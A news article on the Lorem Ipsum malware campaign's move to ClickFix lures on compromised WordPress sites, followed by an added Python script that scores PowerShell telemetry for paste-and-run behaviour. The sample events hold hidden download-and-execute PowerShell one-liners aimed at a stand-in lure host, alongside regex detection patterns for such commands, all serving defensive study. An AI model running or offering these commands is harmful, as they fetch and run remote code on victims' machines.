Lorem Ipsum Malware Pivots to ClickFix Delivery After Microsoft Takedown
The Lorem Ipsum malware campaign, now linked to the Vice Society ransomware group, has shifted to ClickFix lures hosted on compromised WordPress sites after Microsoft disrupted its certificate supply.

The operators of the Lorem Ipsum shellcode loader and backdoor have abandoned their previous delivery method of Trojanized Microsoft Teams installers in favor of ClickFix social-engineering lures, according to new research from BlueVoyant. The shift occurred in late May 2026, just days after Microsoft dismantled the Fox Tempest (aka Forging Marauder) malware-signing-as-a-service infrastructure and revoked more than 1,000 fraudulently obtained Microsoft Trusted Signing certificates. While the takedown temporarily disrupted the threat actors, they quickly pivoted to a new and potentially more dangerous delivery model that eliminates the need for code signing entirely, since the victim, not a signed installer, launches the malicious command.
BlueVoyant, which has tracked the Lorem Ipsum campaign since February 2026, now strongly believes the operation is linked to Rapid Brigantine, a financially motivated cybercriminal group also tracked as Vanilla Tempest, DEV-0832, and Vice Society. This group has been active since at least mid-2022 and is associated with multiple ransomware families including Rhysida, BlackCat, Zeppelin, and Quantum Locker. The connection is significant for defenders because it suggests the Lorem Ipsum campaign is part of a broader ransomware operation with a history of deploying destructive payloads against victims.
The new ClickFix delivery model uses at least five legitimate but compromised WordPress websites spanning multiple sectors including architecture, legal services, and construction technology. The attack chain begins when a user arrives at one of these websites, where an injected iframe displays a fake browser update notification claiming the user's browser is out of date. The pop-up instructs the user to paste a provided PowerShell command, disguised as a Microsoft Edge security intelligence update, into their Windows Terminal. Running that command silently downloads and executes the Lorem Ipsum malware in the background while displaying a fake success message.
The Lorem Ipsum campaign initially relied on SEO poisoning to lure users into downloading Trojanized Microsoft Teams installers signed with valid Microsoft Trusted Signing certificates. Victims who ran the fake installers unknowingly deployed a multistage shellcode loader and backdoor that gave the attackers a foothold on their systems. BlueVoyant's analysis found Lorem Ipsum using a sophisticated, multistage infection chain with DLL sideloading, encrypted payloads, and a command-and-control (C2) mechanism that abused the legitimate Indian blogging platform LetsDiskuss[.]com as a dead-drop to retrieve C2 server addresses.
BlueVoyant identified multiple indicators linking Lorem Ipsum to Rapid Brigantine, including a Microsoft report in October 2025 describing an SEO poisoning-driven Vanilla Tempest campaign involving Teams installers, the shared use of Forging Marauder/Fox Tempest for obtaining malware signing certificates, and a DFIR report where a Lorem Ipsum-associated loader delivered a backdoor associated with Rapid Brigantine. The pivot to ClickFix broadens the potential victim pool from users who encountered fake Microsoft Teams installers on SEO-poisoned and malvertised download portals to anyone browsing one of the compromised WordPress sites.
For defenders, the broader implication is that detection and prevention strategies cannot rely on assumptions about initial access vectors. Organizations need to anticipate fast-moving, multichannel delivery models that combine social engineering, legitimate web infrastructure abuse, and user execution of malicious commands. BlueVoyant emphasized that "defending against this ClickFix campaign and the broader Rapid Brigantine post-exploitation activity that typically follows requires prioritizing behavioral detections over static indicators, given the operators' demonstrated capacity for rapid pivot in response to disruption."
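The attack chain described above (fake browser-update pop-up, user pastes a PowerShell command into Windows Terminal, silent download and execution) and BlueVoyant's recommendation to prioritize behavioral detections both come down to the same question: what does a paste-and-run ClickFix execution look like in endpoint telemetry? The following Python is an added example written for this article, not code from BlueVoyant or from the campaign report. It scores simplified, constructed records in the shape of Sysmon Event ID 1 process creations and PowerShell script block logs (Event ID 4104) for generic paste-and-run traits: a download primitive, dynamic or encoded execution, window-hiding flags, and a launch from a user-facing parent process. The event format, the `.invalid` URLs, and the scoring weights are all assumptions made for the example; none of the patterns are published Lorem Ipsum indicators.

```python
"""Behavioral scoring for ClickFix-style paste-and-run PowerShell execution.

Added example for this article. All events below are constructed; the regexes
describe generic paste-and-run tradecraft, not campaign-specific indicators.
"""
import re
from dataclasses import dataclass

# Ways a one-liner fetches something from the network.
DOWNLOAD = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer|\bcurl\b", re.I)
# Ways a one-liner runs what it fetched (or hides what it runs).
EXECUTE = re.compile(r"invoke-expression|\biex\b|-enc(odedcommand)?\b|frombase64string", re.I)
# Flags that keep the window hidden or skip policy and profile checks.
STEALTH = re.compile(
    r"-w(indowstyle)?\s+h(idden)?\b|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}
# Parents that mean a human (or a lure shown to a human) started the shell,
# as opposed to a scheduled task, service, or management agent.
USER_LAUNCHERS = {"explorer.exe", "windowsterminal.exe", "openconsole.exe", "cmd.exe"}
ALERT_THRESHOLD = 4  # assumed tuning value for this example


@dataclass
class Finding:
    event_id: str
    score: int
    reasons: list


def _content_score(text: str):
    """Score the command text itself, independent of where it was observed."""
    score, reasons = 0, []
    if DOWNLOAD.search(text):
        score += 2; reasons.append("remote download primitive")
    if EXECUTE.search(text):
        score += 2; reasons.append("dynamic execution or encoded command")
    if STEALTH.search(text):
        score += 1; reasons.append("window hiding or policy bypass flags")
    return score, reasons


def score_event(ev: dict):
    """Return a Finding for a PowerShell-related event, or None for anything else."""
    if ev["type"] == "process":
        if ev["image"].lower() not in SHELLS:
            return None
        score, reasons = _content_score(ev["cmdline"])
        if ev["parent"].lower() in USER_LAUNCHERS:
            score += 1; reasons.append(f"launched from user context ({ev['parent']})")
    elif ev["type"] == "scriptblock":
        # Commands pasted into an already-open console never appear as a new
        # process; script block logging is the only place they show up.
        score, reasons = _content_score(ev["text"])
        if "\n" not in ev["text"].strip() and len(ev["text"]) > 80:
            score += 1; reasons.append("long single-line script block (paste-style)")
    else:
        return None
    return Finding(ev["id"], score, reasons)


def detect(events):
    """Return findings at or above the alert threshold, in input order."""
    return [f for f in (score_event(e) for e in events) if f and f.score >= ALERT_THRESHOLD]


# Constructed sample telemetry (not real logs). e1: Run-dialog style launch of a
# hidden downloader; e2: one-liner pasted into an open console; e3-e6: benign.
SAMPLE_EVENTS = [
    {"id": "e1", "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -nop -ep bypass -c "iex (iwr '
                'https://cdn.example-lure.invalid/edge-update.ps1 -UseBasicParsing)"'},
    {"id": "e2", "type": "scriptblock", "host": "powershell.exe",
     "text": "$u='https://cdn.example-lure.invalid/update'; iex (New-Object "
             "Net.WebClient).DownloadString($u) # Edge Security Intelligence Update"},
    {"id": "e3", "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe"},
    {"id": "e4", "type": "process", "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"id": "e5", "type": "scriptblock", "host": "powershell.exe",
     "text": "function Get-Inventory {\n  Get-ChildItem C:\\Users\n}"},
    {"id": "e6", "type": "process", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.event_id}: score={f.score} {', '.join(f.reasons)}")
```

The split between process and script block events is the point of the example. A user who pastes into a Windows Terminal console that is already running PowerShell executes the lure inside the existing powershell.exe, so process-creation telemetry records only the earlier, innocuous console launch (event e3 above); the pasted command is visible only if PowerShell Script Block Logging (Event ID 4104) is enabled and fed into the same scoring. Scoring on traits rather than exact strings is what lets the rule survive a change of hosting domain, file name or lure text, which is the behavioral-over-static posture BlueVoyant recommends.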
Newly published threat intelligence from Morphisec, BlueVoyant, and Huntress reveals that the broader ClickFix ecosystem has expanded beyond Lorem Ipsum to include two additional malware loaders, BabaDeda Loader and Potemkin. While this story focuses on Lorem Ipsum's pivot after Microsoft's takedown, the new reporting shows ClickFix campaigns now target education and financial organizations with a modular crypter framework capable of deploying DanaBot, SectopRAT, and information stealers through hidden PowerShell and DLL side-loading chains.